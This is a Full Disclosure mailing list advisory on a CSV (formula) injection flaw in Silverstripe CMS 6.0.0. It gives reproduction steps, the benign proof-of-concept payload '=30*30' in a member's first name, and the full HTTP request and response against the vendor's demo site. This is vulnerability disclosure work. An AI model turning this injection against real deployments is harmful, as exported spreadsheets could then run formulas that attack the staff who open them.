Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

CSV Injection - silverstripecmsv6.0.0

From: Andrey Stoykov <mwebsec () gmail com>
Date: Sat, 23 Aug 2025 15:14:20 +0100
# Exploit Title: [Vuln] - silverstripecmsv6.0.0
# Date: 08/2025
# Exploit Author: Andrey Stoykov
# Version: 6.0.0
# Tested on: Debian 12
# Blog:
https://msecureltd.blogspot.com/2025/08/friday-fun-pentest-series-40-csv.html

CSV Injection #1:

Steps to Reproduce:

- Login and visit "Security" > "Add Member" > "First Name" and enter
payload of =30*30
- Then visit "Reports" > "Users, Groups and Permissions" > "Export as CSV"
- Payload would render upon opening the CSV file


// HTTP POST Request

POST /admin/security/users/EditForm/field/users/item/new/ItemEditForm
HTTP/1.1
Host: demo.silverstripe.org
Cookie:
visid_incap_3234715=JSWe9qhQRzmcfQM+hQYKo520oGgAAAAAQUIPAAAAAAA1lIwlny722Bqz5Fh2HjIm;
incap_ses_1578_3234715=pDp6BF9HRASFHbw47i7mFZ20oGgAAAAAwGUa55EbwGNyrjzYe9Tvtg==;
_ga=GA1.2.147977582.1755362464; _gid=GA1.2.845482632.1755362464;
cms-panel-collapsed-cms-menu=false; PHPSESSID=haijog8p8qokn0uf46rkvvfsv4
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
[...]

FirstName=%3D30*30&Surname=test&Email=test%40example.com
&Password%5B_Password%5D=&Password%5B_ConfirmPassword%5D=&Locale=en_US&FailedLoginCount=&SecurityID=8f151871365766eb90355f98c745a93ae8f5205c&action_doSave=1&BackURL=https%3A%2F%
2Fdemo.silverstripe.org%2Fadmin%2Fsecurity



// HTTP Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 16 Aug 2025 17:02:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
x-status: Saved%20Member%20%22test%2C%20%3D30%2A30%22%20successfully.
x-controllerurl: admin/security/users/EditForm/field/users/item/510
x-pjax: CurrentForm,Breadcrumbs,ValidationResult
x-controller: SilverStripe\Admin\SecurityAdmin
x-title: Silverstripe+-+Security
x-frame-options: SAMEORIGIN
vary: X-Requested-With
[...]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: